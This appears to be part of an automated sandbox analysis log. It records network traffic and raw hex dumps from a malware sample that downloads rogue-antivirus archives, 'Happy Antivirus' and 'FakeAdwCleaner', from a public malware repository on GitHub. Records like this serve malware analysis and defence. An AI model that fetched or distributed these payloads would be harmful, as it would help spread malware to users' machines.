                                                                                                        2022-09-29 12:46:24 UTC11685INData Raw: 8c 51 32 fb 54 97 0c 7a 0c c1 07 a9 70 92 2a ee e7 ec 0b 8f 7b 74 0a df 5b e2 4f b5 3e 7f 64 51 77 7e 43 d9 8c 85 8c 65 0d 6c 6b 7c 2c 86 49 58 1a 51 78 5d d2 6b 34 58 2e b6 b8 a0 1c 95 07 50 6a 9e d4 1c 41 43 30 07 5e be 4c 35 d0 1f 52 a7 a6 ff a7 45 02 95 cf bd e3 a3 ef 08 0f 13 c4 8f 90 4e 08 7a ab e9 41 3a 38 87 0c ea 65 89 74 8d 7d 4f 6f 83 3a a5 b0 e3 90 85 dc ff 1c 45 4f f3 cf 9f 13 a4 9e 19 bc 96 9d fb ff 70 d8 9e f7 88 0b 70 10 99 92 af a6 d1 bf 06 82 ee 46 37 1c d7 b3 c2 19 1c e6 fe ef c5 49 73 06 98 7c 20 66 2b f5 3f e3 ba 36 25 5c 38 11 bd b2 8a ea 66 40 71 ac ea 31 ac 9c 13 9d 0f c0 10 c1 f8 4a 1e 5c 2e 32 a6 21 b0 a6 c4 96 21 6c 3f 0d 1d 87 24 33 d3 83 b0 8a f0 a8 c7 79 1c 5f b7 d1 2f e6 05 83 74 f2 c6 8d 41 9b 41 80 ae 7b 00 88 ff 4e 51 9c
                                                                                                        Data Ascii: Q2Tzp*{t[O>dQw~Celk|,IXQx]k4X.PjAC0^L5RENzA:8et}Oo:EOppF7Is| f+?6%\8f@q1J\.2!!l?$3y_/tAA{NQ
                                                                                                        2022-09-29 12:46:24 UTC11701INData Raw: 6d a9 84 5a 8a a5 f9 07 b6 49 bf b8 ee 87 18 9c 9d 28 03 60 71 0a 85 ee d4 41 85 aa b4 c5 87 5e 2f 3c 0e b3 70 21 8b f7 25 06 cf 9f ca 2a c9 05 14 d3 09 4d 92 19 d2 c2 ff 25 51 c5 5e 75 49 b0 b1 0a bb b0 fc 59 ed ca 8a 58 8d ee 0a 2b 40 9c 06 a0 3c 44 91 fc a9 d3 2e 58 da 82 b5 46 8e b6 cf b9 c4 e5 f3 a0 6d 42 eb a9 3a 40 f0 49 82 09 46 bc 94 76 6f 0d fb b6 c0 89 11 24 f7 38 d4 76 c4 12 43 4b fd 0f 05 d9 81 95 19 0e c8 66 ee 18 e0 58 b3 ae e0 05 44 75 a8 ae 09 fd 35 cf e7 31 03 13 41 be 2c e8 c8 57 51 5e 92 bc 56 67 6e 8b 67 b0 7e cc be 98 9f 31 56 ef 1c 02 3b 45 1d a1 64 1d 1d a8 1e 16 0e 08 bd ca 26 db 66 54 cc 79 2f 1b dc 8e 10 89 f3 db 47 90 82 00 63 81 8f 1d 7c 69 12 45 a3 fe 33 87 e4 05 91 c6 35 40 4b 1b bc a2 f7 e8 01 0d d3 5f 86 3b 5b ae d1 99 87
                                                                                                        Data Ascii: mZI(`qA^/<p!%*M%Q^uIYX+@<D.XFmB:@IFvo$8vCKfXDu51A,WQ^Vgng~1V;Ed&fTy/Gc|iE35@K_;[
                                                                                                        2022-09-29 12:46:24 UTC11717INData Raw: a2 72 6a 8c b8 0f 7a e3 95 f3 fb ca 87 96 74 f7 22 7d 4c a4 68 48 ae e6 ca 8f 98 ce f1 03 aa a2 c4 c3 c6 58 a6 74 87 8e 37 8e d5 af ea 12 98 d8 fb 4e 3a 2c 6b 11 55 28 0a 09 76 87 24 65 d3 cd 6e 71 0e 35 56 49 71 b5 25 7e ae 86 ca b4 27 61 7e 3c 01 a2 5c d3 b7 7e a1 6f c6 de 87 eb 31 0f 2e 93 c5 bd da b5 d4 51 72 3c fd c7 b4 a0 31 a2 1b 7e 55 9c c5 f0 95 d5 b1 c3 0b fe d6 3d ef 66 33 f6 73 87 0d 40 80 65 3b d1 41 ee 59 e0 ca 8a 08 09 08 b1 d7 4e dd 58 e9 29 17 be 44 56 ba 8a a8 45 df e0 1f d0 68 28 2e 8b 23 d4 f6 f5 05 54 72 8b bd 76 90 49 2f 3d a4 00 5a 32 6e b0 be 8f ce 69 b1 3b ae a9 61 81 cc aa 9e b9 a7 ec 4a 52 3c 13 d0 ab f7 6b dc a7 8a 40 8a a7 7b 1f 93 68 2d f9 a2 77 a8 00 f6 ee aa 30 59 79 e3 5a fb a5 11 62 ed f0 6b 9b 09 9f a9 03 4e 9b 77 10 af
                                                                                                        Data Ascii: rjzt"}LhHXt7N:,kU(v$enq5VIq%~'a~<\~o1.Qr<1~U=f3s@e;AYNX)DVEh(.#TrvI/=Z2ni;aJR<k@{h-w0YyZbkNw
                                                                                                        2022-09-29 12:46:24 UTC11733INData Raw: e0 22 fc 1f 28 f9 4f aa ba f7 f0 0f d6 f9 a8 c0 aa d7 27 1e db 49 7c 78 82 97 fd 77 86 9b 01 ac 69 10 31 6e bf d5 e7 01 c5 f1 8d 8b 91 81 5f 0b 77 7f 8c 11 79 44 69 37 fd 16 8b cd f6 b4 97 76 39 69 10 e4 f8 c6 93 18 d1 74 d3 01 4b f4 82 94 6d ac d7 9d af 21 3b fa 42 ae e9 82 66 c5 f8 15 e1 1d a1 a0 c1 38 5b b2 40 43 27 24 2b b8 a4 f0 84 0a f9 b0 6a 4d d9 9e 86 c0 36 4f fb 62 c1 8c 8a 56 cb 57 0a e3 c3 56 54 24 3e 32 c4 6b d9 20 50 c6 97 54 4d 51 a2 8c da f8 4c ee cd 7f bb 67 f7 12 a4 7b fd 41 dd 16 5d 08 59 c9 ee 2e ef b4 2b a6 ec b2 81 da ef 9d dd 85 cc 6d 66 ed 82 77 a8 d2 cc c4 4b 0d fb ce 5e d2 4d 7f 09 7c 4a 60 e8 23 84 6a 87 df c6 71 f1 d6 4f 63 c8 16 59 56 0c 03 e3 43 82 45 1a 7c b3 47 2e 34 c0 ca 98 bc 9a bd f0 59 14 f2 56 7c f8 7c b9 7a 73 bf 94
                                                                                                        Data Ascii: "(O'I|xwi1n_wyDi7v9itKm!;Bf8[@C'$+jM6ObVWVT$>2k PTMQLg{A]Y.+mfwK^M|J`#jqOcYVCE|G.4YV||zs
                                                                                                        2022-09-29 12:46:24 UTC11749INData Raw: 1a 29 47 a6 9a 78 d3 16 01 e9 39 43 d3 67 52 0f 14 94 26 df f7 5f b3 e1 2c 4b 90 36 64 bd 14 f9 60 ce 20 ed 43 f4 11 96 6d 4a a1 db 85 42 55 4e 66 5a 6d e4 e9 ab 63 d8 0e 7e 89 a4 a7 b7 b6 19 49 c1 e5 1b 52 09 65 61 f1 af 91 c8 0a e8 84 2c 30 ed 37 7d 57 ae 8e 60 e2 99 8e df 9e f9 f3 84 19 19 fd 61 dc 20 0b 78 52 ad 3d 8e e8 9d 58 b5 92 57 9b b4 37 88 ea f4 87 06 f9 9c 89 89 5b 63 c2 15 8b 39 6a 96 1d e3 77 b7 f9 02 0e 1b 41 87 08 1f 67 17 6b 31 4f c7 34 5a a6 18 d7 49 59 2c af 44 be 64 3e 4c 1d 29 6e d4 a0 46 69 34 80 2c b3 84 b0 5a 5c d8 bb 61 50 ab 11 01 95 f4 2a d8 5e 8c 49 59 1c 4b 2b 9d 82 14 b4 76 1e 01 ce 17 15 b1 11 60 a6 d5 99 3b c7 e8 7f 13 4b 01 7d a7 20 7f 6c 6c e0 06 04 16 e0 2e c8 83 dc dd f1 5b 86 03 65 d3 9f f2 17 59 6e 4e e2 e6 96 16 ec
                                                                                                        Data Ascii: )Gx9CgR&_,K6d` CmJBUNfZmc~IRea,07}W`a xR=XW7[c9jwAgk1O4ZIY,Dd>L)nFi4,Z\aP*^IYK+v`;K} ll.[eYnN
                                                                                                        2022-09-29 12:46:24 UTC11765INData Raw: ac 8e 93 f8 46 15 fc 33 55 44 38 3c cd cb e9 2c 91 f1 36 98 5b 8b 29 c8 a5 bf e5 56 e1 28 65 dc c5 12 15 06 d8 bf cd ea e6 39 3c c4 e2 a9 1c 56 98 c5 00 e3 31 82 67 ce b1 59 f6 72 5e f9 b2 f0 b5 66 d9 4e ef af ae 1b e1 c2 b3 31 57 37 df 0b 52 d7 7c 69 00 28 a1 d6 92 81 52 c0 f0 fa 83 fb 54 0f 08 8d 12 ab df 98 59 70 5d d9 d3 53 32 41 6f 09 61 d1 b8 fc 89 b3 40 f6 31 72 b3 68 c2 6b 1e 1a dc 54 85 cf fb ae ca 51 62 ec af e6 d8 54 d1 3e 1b f8 3a 44 fc 4c 06 1d 90 2b 26 cb 34 8b 4c 11 44 3a 2f 86 2a 72 5d 6b d1 b0 22 d0 cc ec 2d ad b9 13 93 2a e4 ce c4 d4 3b 53 76 ab a5 49 a6 be d3 44 c3 fd a1 ca e7 af e4 ae 75 98 b0 6d d2 91 d8 66 d5 98 e2 2a 01 6f 07 16 75 bd ac 5e 74 dc d4 e3 c2 45 71 c2 ff bf d0 9e 61 59 a0 d0 49 dc 5c 24 6e 53 41 7e c8 0d bb 31 bf f8 87
                                                                                                        Data Ascii: F3UD8<,6[)V(e9<V1gYr^fN1W7R|i(RTYp]S2Aoa@1rhkTQbT>:DL+&4LD:/*r]k"-*;SvIDumf*ou^tEqaYI\$nSA~1
                                                                                                        2022-09-29 12:46:24 UTC11781INData Raw: 24 1c 6c d2 7e 19 aa 17 55 59 69 f5 32 7e cd 51 4d fd ad 64 36 e2 19 d8 f2 0d 0b b1 25 9c ad 90 41 66 cf 1d be 81 40 74 ae ca be 92 e5 8e bf a6 8a c1 19 c1 9a f7 c0 ae 8b ce 9a a7 1a 42 e8 e9 63 86 36 f3 39 f7 e8 dd 2a ae 1b 83 b8 09 3b b0 3e 9f 21 56 0f 00 e5 f2 5c 0d 44 7e 2e 70 6d 68 f5 2f 9c 33 d6 47 ef d6 d5 ce 94 20 5c 86 14 c6 02 b5 60 de 5f 56 b2 09 0b 39 fb ba 86 fc eb 93 48 63 69 e1 99 9a f7 63 b0 d2 b9 89 a2 98 c9 47 60 ee 51 f7 30 66 83 89 89 f3 a7 14 9a 74 7a 60 86 49 e8 ca d0 f9 83 32 b4 fc 06 82 7b 2b be 9b c9 b5 70 62 6f 61 08 9a 93 cd 05 aa f5 c7 a5 fe e5 ca 08 b2 21 f3 59 6f 26 e7 7b 48 af 4e fd 9a 2d 94 72 55 58 03 6a 50 cd d0 f0 c6 48 2f 02 43 b3 6b 01 80 2c 66 10 b1 61 6a 23 d0 57 2d 47 08 10 12 a4 20 91 d2 91 18 65 88 01 75 d2 f3 d2
                                                                                                        Data Ascii: $l~UYi2~QMd6%Af@tBc69*;>!V\D~.pmh/3G \`_V9HcicG`Q0ftz`I2{+pboa!Yo&{HN-rUXjPH/Ck,faj#W-G eu
                                                                                                        2022-09-29 12:46:24 UTC11797INData Raw: dd 10 79 8f d2 8e f2 7d f9 5b a9 0d 8d d8 db b0 86 7e a0 a1 22 68 24 49 1f 3e b9 b9 84 6d b5 1c b4 a3 6e f9 7b d2 a6 ae 7e 3e 36 f7 37 5e cc 27 d3 f9 e2 d4 6f 1b 4d 1b f9 66 33 98 22 87 a7 61 63 2d 05 f0 7f 5e 74 e2 a1 16 d9 bb 90 96 fd 6b 80 9c d6 5d 48 a3 ec d7 b6 da fb fd c6 99 a0 ca fa 27 05 b1 13 6e 9e b8 0c 86 1e e9 8d 0e 3f 08 02 5e a1 da 99 f0 e0 5f 53 d5 65 43 3c 29 65 a7 ab ef 1b 11 56 ee 30 ab ef b0 86 2d 33 6c d5 cd a4 24 25 4f 8f 07 f0 7b 5a 70 bf 2b da 25 dc 55 51 bf 17 a8 81 ed 84 8e 11 4e 4d 3f bd 9e 7f ae 7d e0 37 d2 a1 f1 d3 f5 4b 8e 62 d8 d7 fc d9 6a b8 db e0 96 90 63 75 61 d5 42 6e e5 1b cb c7 29 e1 de a0 c3 6e 17 41 12 1c c3 52 d8 31 1e df aa e5 bd a3 90 35 3a 3e 3f ee e5 97 9f 7a f6 e1 fb 84 e1 88 fa 17 bd 05 97 83 96 9a 2e e4 e0 b9
                                                                                                        Data Ascii: y}[~"h$I>mn{~>67^'oMf3"ac-^tk]H'n?^_SeC<)eV0-3l$%O{Zp+%UQNM?}7KbjcuaBn)nAR15:>?z.
                                                                                                        2022-09-29 12:46:24 UTC11813INData Raw: 20 00 00 00 00 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 46 61 6b 65 41 64 77 43 6c 65 61 6e 65 72 2e 65 78 65 0a 00 20 00 00 00 00 00 01 00 18 00 00 1e d0 07 a5 47 d0 01 c8 aa 11 dd 09 04 d5 01 a8 a9 d3 be 09 04 d5 01 50 4b 05 06 00 00 00 00 01 00 01 00 6f 00 00 00 90 bc 02 00 00 00
                                                                                                        Data Ascii: Endermanch@FakeAdwCleaner.exe GPKo


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        38192.168.2.449788140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:46:30 UTC11813OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/Happy%20Antivirus.zip HTTP/1.1
                                                                                                        Host: github.com
                                                                                                        2022-09-29 12:46:30 UTC11813INHTTP/1.1 302 Found
                                                                                                        Server: GitHub.com
                                                                                                        Date: Thu, 29 Sep 2022 12:46:30 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                        Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                        Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Happy%20Antivirus.zip
                                                                                                        Cache-Control: no-cache
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                        X-Frame-Options: deny
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 0
                                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                                        Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                        2022-09-29 12:46:30 UTC11814INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        39192.168.2.449789185.199.110.133443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:46:30 UTC11816OUTGET /Endermanch/MalwareDatabase/master/rogues/Happy%20Antivirus.zip HTTP/1.1
                                                                                                        Host: raw.githubusercontent.com
                                                                                                        2022-09-29 12:46:30 UTC11816INHTTP/1.1 200 OK
                                                                                                        Connection: close
                                                                                                        Content-Length: 1721302
                                                                                                        Cache-Control: max-age=300
                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                        Content-Type: application/zip
                                                                                                        ETag: "bb71b3fc58fb603cf14e33295d1c8eaf2a0ad05101b7a8b78df809147209e36e"
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-Frame-Options: deny
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        X-GitHub-Request-Id: 9B5A:0543:E4C62A:F30433:63359351
                                                                                                        Accept-Ranges: bytes
                                                                                                        Date: Thu, 29 Sep 2022 12:46:30 GMT
                                                                                                        Via: 1.1 varnish
                                                                                                        X-Served-By: cache-mxp6977-MXP
                                                                                                        X-Cache: HIT
                                                                                                        X-Cache-Hits: 1
                                                                                                        X-Timer: S1664455590.478170,VS0,VE2
                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        X-Fastly-Request-ID: 25b9c3c7cdb527f6a609e86def070b6bd57f36c7
                                                                                                        Expires: Thu, 29 Sep 2022 12:51:30 GMT
                                                                                                        Source-Age: 85
                                                                                                        2022-09-29 12:46:30 UTC11816INData Raw: 50 4b 03 04 14 00 01 00 08 00 1c 34 33 4c d9 8f 00 b3 16 43 1a 00 00 a2 1e 00 1d 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 48 61 70 70 79 41 6e 74 69 76 69 72 75 73 2e 65 78 65 f8 2b 0e 2e 8c 29 68 4b e2 fb 48 16 3b 20 4e 07 3a 4e 83 02 e6 8c a5 48 55 e4 32 b4 95 93 c6 a0 c3 7c ab 92 e0 87 d0 02 d5 04 78 62 70 65 75 9a 97 86 11 34 98 97 cd 97 73 74 dc 2c 4f 22 09 b0 c7 96 32 1d dc ca 93 24 ea 9d 57 89 17 31 56 cd df 61 9d e8 1e 3e f6 5c 66 8d 23 70 99 5c 0c 9a 19 24 e2 d8 c2 3c 6d a8 d2 5a be fc 3a 13 61 f6 f5 7a b5 d9 f8 42 70 0a 62 f9 42 c3 b2 50 ae e2 70 4f 5a 25 72 a4 ee b3 0f 10 eb e1 04 4a 1a c8 a6 26 29 7b ed 6e 8c cf 45 da 01 e7 d0 73 ba 2b 43 92 58 a7 d6 5f be fa 1e 84 cd ad fd 63 14 66 6a db 88 d7 78 2b d4 d3 70 17 58 a2 ea 55 e1 92 3a 15 2f 21
                                                                                                        Data Ascii: PK43LCEndermanch@HappyAntivirus.exe+.)hKH; N:NHU2|xbpeu4st,O"2$W1Va>\f#p\$<mZ:azBpbBPpOZ%rJ&){nEs+CX_cfjx+pXU:/!
                                                                                                        2022-09-29 12:46:30 UTC11818INData Raw: b5 53 d3 9c b3 09 c1 8e 8c f4 67 13 a1 5b 47 b1 d0 aa e0 fb 1c c7 d6 a4 30 fc 4a a5 34 07 ec cd 83 87 f6 d1 be e0 e7 42 ed c5 8e b1 c1 fb 18 a1 1d 7b 82 5b 5e 57 83 e3 52 2c 47 84 51 08 27 7e f3 6c 32 4f 33 4c 67 e7 1d fd 64 b3 b4 e9 5a 09 d2 b9 c6 a9 41 4d 82 2d ec 34 1d 3c 3b e6 19 27 57 7f 20 ac f2 17 37 09 40 c7 3a 92 b3 bd 3e 5f 62 2d 64 af ab 22 e0 c6 f8 66 1f 96 a8 77 7d 9d ba fd 05 f3 0b 0a 44 01 40 5c b8 e9 d3 a4 fa df a3 95 ef 04 64 e0 5d 73 fb b0 09 b3 35 b8 6b d4 3d 80 e2 f0 d4 31 54 37 de ee 08 59 59 12 87 e6 0c 82 d8 a3 78 2a b1 86 1c 7d 2d 26 35 5c d7 34 9e 19 d1 88 93 ac d3 df 9f 15 80 92 98 f0 8b 67 17 ce c6 0c 1d 0f 12 d2 5f 6d b1 8a 77 c0 ef 05 ce 9a 78 a4 0d 8c be c0 7c 69 89 1b 48 74 e0 be 58 bb 17 bd b7 c2 f1 b2 20 e8 76 eb db 9d 3c
                                                                                                        Data Ascii: Sg[G0J4B{[^WR,GQ'~l2O3LgdZAM-4<;'W 7@:>_b-d"fw}D@\d]s5k=1T7YYx*}-&5\4g_mwx|iHtX v<
                                                                                                        2022-09-29 12:46:30 UTC11819INData Raw: 1e ac cf 08 73 95 5c 23 20 a5 db 01 3b 98 84 42 aa 9e 70 c8 9c a8 a5 de d6 08 e3 28 8b 65 ba 2e 60 62 ec b8 42 43 03 13 18 93 d2 b5 a3 11 7a a1 85 e5 96 13 1e 4d 93 43 5c c1 39 77 59 59 28 e1 ea 24 90 96 a7 3d 7c 2c 49 20 cc 89 3c a3 b0 47 94 41 8b 82 e6 17 ec 0a 01 f9 26 73 11 ea 52 d3 c3 b3 23 2a 97 61 a3 08 2b fe be 6c 4e 32 dd e9 29 cb 7f 05 03 9c 36 0d 25 1b be fc ec 98 69 60 81 bd 0c c1 ec f6 53 52 a1 2b a2 f4 99 d5 f9 33 74 8e 4f 15 49 93 5b 65 c2 96 a4 32 ae 9a 2e 19 42 1f 0d 7f c2 46 20 0b 40 ed 95 98 a8 ff 13 8a ea bf 37 2a d1 ac 87 73 73 a3 f5 19 1e ef 3e a5 0c 06 c1 4e 12 6d 33 78 c2 d3 ff 6f 2e 0a 04 2a 2a d5 a9 36 8d de 19 11 02 07 4d 07 6f 19 d0 41 97 15 47 76 b7 b4 6b 54 3a 42 cf e3 56 5c dc 5b 75 8c b1 ca 36 1c 12 20 08 e6 b3 b6 c0 f6 2e
                                                                                                        Data Ascii: s\# ;Bp(e.`bBCzMC\9wYY($=|,I <GA&sR#*a+lN2)6%i`SR+3tOI[e2.BF @7*ss>Nm3xo.**6MoAGvkT:BV\[u6 .
                                                                                                        2022-09-29 12:46:30 UTC11820INData Raw: ac 43 2f a2 90 f0 31 90 f4 64 d2 ad 64 7e d3 7a 52 03 98 51 5f 4c 3e 3b 9d 64 51 19 57 c8 8d 75 ec a6 11 e6 36 43 ba 68 f3 45 3a 90 5b da 25 cf ca 35 d7 d6 dc f2 82 45 32 12 0f a0 13 f3 1e c0 46 7d 6e 18 bc 45 6a 23 85 eb 55 2f 5c ed 44 86 e5 7d 7f 3c c3 95 77 de ac cd b1 6e b1 cf c3 ef 36 8b 4f ae 72 08 c8 c4 98 c1 de cc 7e af 7c cc d6 dd 4b cc 87 db eb 52 41 ea aa df 57 09 c0 22 ae c8 62 b5 15 e5 24 4b df 86 9a 5e a4 dc d1 0c 4c dc b9 fc c3 07 40 fe ac 1d 94 f3 f7 df c4 4a a3 de a9 a2 a4 ce c3 d6 4c 0e 5e 5d 0c ed 5f 97 59 fe 3f 6b f4 0f 90 44 98 1b 26 48 a4 ff d5 f8 7e 02 1e 88 1d 00 c4 f9 3f 5e 17 95 33 69 39 0e 47 1c de f3 47 cb f4 7c 39 21 59 fc 1d 14 fe ea a0 9e 40 3c 90 83 b1 e9 70 fc fb 6a 6a 15 56 6f c9 1b bc 73 78 23 e5 9c 25 9c 80 61 0b a6 9e
                                                                                                        Data Ascii: C/1dd~zRQ_L>;dQWu6ChE:[%5E2F}nEj#U/\D}<wn6Or~|KRAW"b$K^L@JL^]_Y?kD&H~?^3i9GG|9!Y@<pjjVosx#%a
                                                                                                        2022-09-29 12:46:30 UTC11822INData Raw: 58 a6 6f b4 b3 b2 32 c5 1d 5c 93 dd 85 fa 61 51 19 8f 8a e9 8a 7f bc d3 17 bf cc 5c 62 74 e7 3f 0f 19 95 91 7a f0 80 29 db a0 3f 13 1c 12 5a 76 54 c3 82 ba 0a 63 7d 71 31 a4 21 20 fb c6 97 5c 25 b2 be a7 e6 d3 50 28 1d 4a 20 b2 5c 11 1f 00 f4 6c 0b c0 dc 02 79 0f f6 70 5a 26 8f 1e 32 89 1e 1e 7c 52 3f 27 93 43 2a ad 4f e5 56 4c 09 0d d1 4f 47 4f 6b 7b 96 2d 6a ff 95 80 12 6a 78 9c f6 7a fc bf 77 14 cc 3e cf aa 64 8a e0 4c 0c dc 20 18 01 a5 b6 62 fa bb fe 32 86 35 0e 5d 93 08 87 ab 8c 07 3f 15 00 94 2e d8 52 8c 02 bf 48 9a c4 76 33 41 29 6d c5 d3 0e e1 0a 01 5f 97 69 9d d8 a1 48 22 28 64 9d d6 3a 88 38 2e a7 2a d2 41 01 64 f4 f1 82 70 d4 7a d9 8e 8d ab ec d4 fd 58 81 2e 6e e3 af 22 a8 e8 bb d3 ad cc db 36 26 3b 3d 72 82 e4 2e 9b 8e ec fd 2e e7 d4 6d 8d 3c
                                                                                                        Data Ascii: Xo2\aQ\bt?z)?ZvTc}q1! \%P(J \lypZ&2|R?'C*OVLOGOk{-jjxzw>dL b25]?.RHv3A)m_iH"(d:8.*AdpzX.n"6&;=r..m<
                                                                                                        2022-09-29 12:46:30 UTC11823INData Raw: a6 e2 2e ac 4a 78 04 36 8f 2c 37 5c cb 4a 01 d5 6a 23 a3 ff e4 b8 b6 c3 45 cb 06 1e 1a 8b a8 09 33 61 8c 3f 17 6a f3 80 a3 40 76 50 4b 16 2b 50 05 4e a6 e4 ee 96 6f 8f 0e 92 41 0d 1c 49 6c ae d7 36 75 3d 5f bd 47 e2 f4 5f ea 96 9c c7 09 5d 56 a6 e3 4d f5 53 94 cb c2 2b 96 98 0e 46 cd 3f 9f 36 48 da a4 a4 77 f4 ac 22 e0 07 ba b2 f1 44 99 ed 6d fd e8 04 de 58 51 0f 28 f3 c0 33 ab c9 43 c2 96 18 d4 fa 80 1a 07 cb 9b 26 00 fa d4 59 98 46 24 ce 27 0c c2 ec d1 a8 8e f3 57 f7 ab b2 cb 8a 20 22 77 4c 51 10 8d e1 ae 9f ba 71 23 e8 81 a1 58 8d 11 a8 9b d6 85 0a db d8 02 9c 43 e5 45 bc ad 73 ec 82 29 ae 64 82 ca 42 65 ce 94 04 d6 76 e3 d6 07 15 ed ba 48 94 5a 5b 18 41 81 38 80 bf bd 3d e3 7d c0 93 a1 9f 42 3a 78 d0 05 23 0e ac a4 b5 46 cb e9 30 f4 70 44 b4 38 0f 8f
                                                                                                        Data Ascii: .Jx6,7\Jj#E3a?j@vPK+PNoAIl6u=_G_]VMS+F?6Hw"DmXQ(3C&YF$'W "wLQq#XCEs)dBevHZ[A8=}B:x#F0pD8
                                                                                                        2022-09-29 12:46:30 UTC11825INData Raw: 00 19 df e4 2b 56 05 42 2d 7f 06 0a cf e6 b0 16 40 0f 72 65 c0 59 55 3d 81 b6 78 fb ef 52 c3 6b 1b c6 04 16 39 fe d7 b2 04 0f b9 72 a7 ec f3 c4 7b e0 00 95 12 df 45 3c b1 9c 98 f3 5d 8b 52 9f 1a 4e 15 7b c2 ae 39 75 96 96 9b 19 c3 ab 81 62 8a d5 c5 a5 da 9e cf 40 43 0a 49 47 12 69 31 da fe 57 c4 3b f1 92 4d a8 8c d7 60 e2 29 50 e4 4a 95 27 0b 19 0d 75 b5 7e 1a 03 66 85 cc 14 c2 47 4b 33 e8 c5 57 99 1a f9 57 a6 4d 38 c4 f6 a3 0f 1a 96 a9 fb 8d ea 1e 5c bc e0 d6 df 32 5c 6c a1 c9 01 cf 99 ea 14 71 c3 33 7c b7 ae 34 21 2f 82 13 39 02 d8 28 ed b3 2a 2b 98 2f 93 d8 cb 04 0f 47 0f 2e 17 32 d2 b5 b8 9f b4 73 0c 3d 79 6a 4d 16 d2 73 2d ee 9b 42 9e 8b 68 59 49 72 b5 f5 87 38 5d 80 dd cb d7 25 5b 90 49 2a 3e 68 ee 6d c2 19 66 84 a8 d2 ea 7c 01 e2 49 3c 90 4c 9d 12
                                                                                                        Data Ascii: +VB-@reYU=xRk9r{E<]RN{9ub@CIGi1W;M`)PJ'u~fGK3WWM8\2\lq3|4!/9(*+/G.2s=yjMs-BhYIr8]%[I*>hmf|I<L
                                                                                                        2022-09-29 12:46:30 UTC11826INData Raw: fa 62 b1 84 fb bb e5 1b ed a8 6e 7d bd 10 db 51 31 5b d4 ae 56 17 20 de d6 d3 88 cf 52 dc 44 7c 86 38 f2 5f 12 b2 15 97 e2 82 3f 35 4a 0c 86 9d ac ff bb fe 0e 4f de b2 8e 01 b7 91 f5 3d 0c 4c cd 21 4d 32 39 50 82 ce 54 3d d3 1c 25 3e 13 64 a7 c3 7b 18 ed 9d fb fe a9 c1 11 7f 09 99 59 ce c0 be 3d 9c 16 3a 2c ad e8 bc 69 86 a0 c1 fc 8d d0 06 6b 26 0a b9 24 68 5d 76 ec b1 1e 00 d1 43 53 41 9a 68 8a f8 8f 11 4c a9 2a 6c 27 c9 a7 0d b3 77 ac aa f2 07 99 5b e1 c8 76 43 b6 24 f1 d0 8d 3f 69 36 37 fa 2a 11 5b 1b f5 79 0f c9 a4 1e 33 29 48 a0 ce bd 12 d6 01 c5 2b 99 80 57 03 90 63 02 4d 55 da 27 37 57 55 41 e3 99 f0 c3 03 d4 0c 65 9c bb b6 35 b1 31 ca fa 0d 24 1d fa 95 2c 65 05 da 6f 30 5c 12 df a2 c0 5d 45 68 3a 92 86 a2 ff 1d 90 29 eb 84 a8 3c 84 c2 09 f6 b8 38
                                                                                                        Data Ascii: bn}Q1[V RD|8_?5JO=L!M29PT=%>d{Y=:,ik&$h]vCSAhL*l'w[vC$?i67*[y3)H+WcMU'7WUAe51$,eo0\]Eh:)<8
